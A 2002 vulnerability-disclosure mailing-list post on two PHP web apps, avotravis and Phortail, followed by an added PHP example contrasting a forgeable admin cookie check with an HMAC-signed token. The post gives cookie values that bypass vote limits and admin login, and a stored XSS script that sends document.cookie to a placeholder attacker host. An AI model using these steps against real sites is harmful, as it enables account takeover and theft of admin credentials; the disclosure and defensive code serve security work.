Vulnerability Development mailing list archives

Security holes in two PHP services.


From: frog frog <leseulfrog () hotmail com>
Date: 1 Mar 2002 16:37:08 -0000



The first one is the poll "avotravis", versions 2.1 and earlier.

1) Distortion of the limitations of multiple votes:
Set the cookie with the name "already_voted" and 
value "1" to the URL /avotravis.php3?vote=1 for "yes" 
and /avotravis.php3?vote=1 for "no".

2) Access to the administration part:
Set the cookie "adminsondage", "true" to the 
webpage http://www.host.com/admin.php3

More details in French:
http://www.ifrance.com/kitetoua/tuto/avotravis.txt


The second is the portal "Phortail", versions 1.2.1 and 
earlier.

The admin password is sent unencrypted in a cookie, and 
there is no limitation on scripts in the posting of 
news. 
It is enough to send this kind of script:
<im*g src="javascri*pt:phortail()">
<s*cript>function phortail() { 
a="http://haxor.com/file?"+document.cookie; 
window.open(a); } </s*cript>
(without the '*') as a news item and wait for the admin...

More details in French:
http://www.ifrance.com/kitetoua/tuto/phortail.txt


The creators have been alerted.
Sorry for my bad English.
frog-m@n
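
An added example, not part of the original post and not avotravis or Phortail source code: the client-set flag check implied by item 2 of the first report, next to a check of a server-issued, HMAC-signed token. The cookie name admin_token, the key handling and all function names are assumptions made for illustration.

```php
<?php
// Added example; hypothetical names throughout, not the projects' own code.

const TOKEN_TTL = 900; // seconds an admin token stays valid

// Pattern implied by the post: the cookie value itself is the authorization,
// so any client that sets adminsondage=true passes.
function is_admin_weak(array $cookies): bool
{
    return ($cookies['adminsondage'] ?? '') === 'true';
}

// Issued only after a successful password check on the server.
// Format: "user|expiry|HMAC(user|expiry)"; $user must not contain '|'.
function issue_admin_token(string $user, string $key, int $now): string
{
    $payload = $user . '|' . ($now + TOKEN_TTL);
    return $payload . '|' . hash_hmac('sha256', $payload, $key);
}

// Accept the cookie only if the MAC verifies and the token has not expired.
function is_admin(array $cookies, string $key, int $now): bool
{
    $parts = explode('|', $cookies['admin_token'] ?? '');
    if (count($parts) !== 3) {
        return false;
    }
    [$user, $expiry, $mac] = $parts;
    $expected = hash_hmac('sha256', $user . '|' . $expiry, $key);
    return hash_equals($expected, $mac)   // constant-time comparison
        && ctype_digit($expiry)
        && (int) $expiry >= $now;
}

$key = random_bytes(32);   // server-side secret, never sent to the client
$now = time();
// Constructed sample cookies: one set by hand, one issued by the server.
$forged = ['adminsondage' => 'true', 'admin_token' => 'admin|9999999999|00'];
$valid  = ['admin_token' => issue_admin_token('admin', $key, $now)];

var_dump(is_admin_weak($forged));                        // weak check, hand-set flag
var_dump(is_admin($forged, $key, $now));                 // signed check, hand-set token
var_dump(is_admin($valid, $key, $now));                  // signed check, issued token
var_dump(is_admin($valid, $key, $now + TOKEN_TTL + 1));  // issued token after expiry
```

The same token scheme keeps the Phortail admin password out of the cookie entirely, and setting the cookie with the HttpOnly attribute keeps it out of document.cookie.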

